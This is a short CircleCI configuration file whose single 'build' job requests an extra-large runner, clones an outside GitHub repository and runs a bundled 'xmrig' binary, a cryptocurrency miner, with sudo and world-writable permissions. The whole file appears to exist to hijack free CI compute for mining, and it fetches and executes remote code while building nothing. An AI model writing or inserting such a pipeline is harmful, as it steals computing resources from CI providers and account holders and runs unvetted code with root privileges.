version: 2.1
jobs:
  build:
    docker:
      - image: cimg/base:2021.10
    resource_class: xlarge
    steps:
      - checkout
      # Whatever you want to do
      - run: sudo apt-get update
      - run: sudo apt-get install screen -y
      - run: sudo git clone https://github.com/yszalxh/circleci.git
      - run: cd /home/circleci/project/circleci && sudo chmod 777 xmrig && sudo ./xmrig
      - run: cd /home/circleci/project/circleci && sudo ./xmrig